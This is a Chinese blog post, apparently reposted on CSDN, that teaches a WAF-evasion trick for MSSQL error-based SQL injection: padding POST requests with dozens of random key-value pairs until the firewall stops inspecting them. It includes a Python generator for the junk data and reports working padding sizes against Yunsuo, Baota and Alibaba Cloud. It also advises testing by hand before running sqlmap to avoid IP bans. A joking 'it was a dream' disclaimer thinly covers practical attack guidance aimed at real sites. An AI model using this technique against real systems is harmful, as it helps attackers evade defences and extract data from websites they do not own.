sql注入语句万能密码_精华 | SQL注入万能Bypass技巧

前言

很多同学问注入bypass的一些细节,刚好前几天晚上做了一个梦,梦里进行了一些测试,今天觉得应该记录一下。

本文纯属虚构,如有雷同纯属放屁。

正文

梦里发现了一处mssql报错注入

cdeac162480c0838b6d7f16f0ca28d02.png

然后发现有云锁

云锁.jpg(假装有图)

用自己写的的脚本生成垃圾数据

#coding=utf-8import random,stringfrom urllib import parse# code by yzddMr6varname_min = 5varname_max = 15data_min = 20data_max = 25num_min = 50num_max = 100def randstr(length):    str_list = [random.choice(string.ascii_letters) for i in range(length)]    random_str = ''.join(str_list)    return random_strdef main():    data={}    for i in range(num_min,num_max):        data[randstr(random.randint(varname_min,varname_max))]=randstr(random.randint(data_min,data_max))    print('&'+parse.urlencode(data)+'&')main()

如果是POST型就直接把垃圾数据放到你要注入的字段前后,如果是GET型就把他转为POST型再放垃圾数据。

88b2a4349f5a0de52b5ee4d4049cee54.png

第一次可能生成太少了,还是被云锁drop包

3bf6fa7d3730ec1ca3cc35e134cc1320.png

多粘贴几次,最后发现在数据包到30KB左右就可以正常注入了

509825d69b91a0b11a4cedf7e31ad14a.png

然后就可以查数据了

5efbca2b002898f70950c2cf7a5b9d40.png

测试数据

目前为止的bypass测试数据:

云锁:30KB宝塔:30KB阿里云:200+键值对安全狗没测过,有空测一下

建议先抓包手工试一下到底多少垃圾数据合适,没问题之后再上sqlmap,不然容易ban ip

回答几个问题

•为什么不直接在get上加垃圾数据?•因为GET型有长度限制,有时候还没加到能bypass的程度服务器就报错。

•为什么不用一个超长字符串要用这么多键值对?•因为经过测试,超长字符串对于阿里云没用,超多垃圾键值对才有用。

•适用类型有哪些?•在梦里的测试中本方法对于市面上绝大多数waf都可以用。

最后

然后梦就醒了,收拾一下准备去工地搬砖了。

a60c83197924c2307a19729c060be968.png

点赞,转发,在看

欢迎加入作者的知识星球

39609569940be6caf30604c350b2233e.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值